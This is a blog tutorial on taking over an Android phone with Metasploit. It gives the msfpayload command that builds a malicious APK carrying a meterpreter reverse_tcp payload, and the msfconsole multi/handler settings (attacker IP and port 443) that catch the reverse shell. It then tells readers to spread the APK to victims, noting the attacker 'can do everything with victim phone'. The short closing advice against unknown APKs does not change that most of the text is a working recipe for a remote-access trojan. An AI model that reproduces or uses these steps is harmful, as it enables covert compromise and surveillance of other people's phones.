Hello Readers!
I am back with a new tutorial
Nowadays mobile users are increasing day by
day, the security threat is also increasing
together with the growth of its users. Our
tutorial for today is how to Hacking Android
Smartphone Tutorial using Metasploit. Why we
choose android phone for this tutorial? simply
because lately android phone growing very
fast worldwide. Here in China you can get
android phone for only US$ 30 it's one of the
reason why android growing fast.
What is android?
according to wikipedia:
Android is an operating system based on the
Linux kernel, and designed primarily for
touchscreen mobile devices such as
smartphones and tablet computers. Initially
developed by Android, Inc., which Google
backed financially and later bought in 2005,
Android was unveiled in 2007 along with the
founding of the Open Handset Alliance: a
consortium of hardware, software, and
telecommunication companies devoted to
advancing open standards for mobile devices.
and what is APK? according to wikipedia:
Android application package file (APK) is the
file format used to distribute and install
application software and middleware onto
Google's Android operating system; very
similar to an MSI package in Windows or a
Deb package in Debian-based operating
systems like Ubuntu.
Here is some initial information for this
tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443
Requirements:
1. Metasploit framework (we use Kali Linux in this tutorial)
2. Android smartphone (we use HTC One
android 4.4 KitKat)
Step by Step Hacking Android
Smartphone Tutorial using Metasploit:
1. Open terminal (CTRL + ALT + T) view
tutorial how to create linux keyboard shortcut .
2. We will utilize Metasploit payload
framework to create exploit for this tutorial.
msfpayload android/meterpreter/
reverse_tcp
LHOST=<attacker_ip_address>
LPORT=<port_to_receive_connection>
As described above that attacker IP address is
192.168.8.94.
3. Because our payload is reverse_tcp where
attacker expect the victim to connect back to
attacker machine, attacker needs to set up the
handler to handle incoming connections to the
port already specified above. Type
msfconsole to go to Metasploit console.
Info:
use exploit/multi/handler –> we will
use Metasploit handler
set payload android/meterpreter/
reverse_tcp –> make sure the payload
is the same with step 2
4. The next step we need to configure the
switch for the Metasploit payload we already
specified in step 3.
Info:
set lhost 192.168.8.94 –> attacker
IP address
set lport 443 –> port to listen the
reverse connection
exploit –> start to listen incoming
connection
5. Attacker already have the APK's file and
now he will start distribute it (I don't need to
describe how to distribute this file, internet is
the good place for distribution ).
6. Short stories the victim (me myself)
download the malicious APK's file and install
it.
7. It's mean that attacker already inside the
victim android smartphone and he can do
everything with victim phone.
Conclusion:
1. Don't install APK's from the unknown
source.
2. If you really want to install APK's from
unknown source, make sure you can view, read
and examine the source code. The picture
below is the source code of our malicious
APK's in this tutorial.
#AnonyMous_Knw
0 comments:
Post a Comment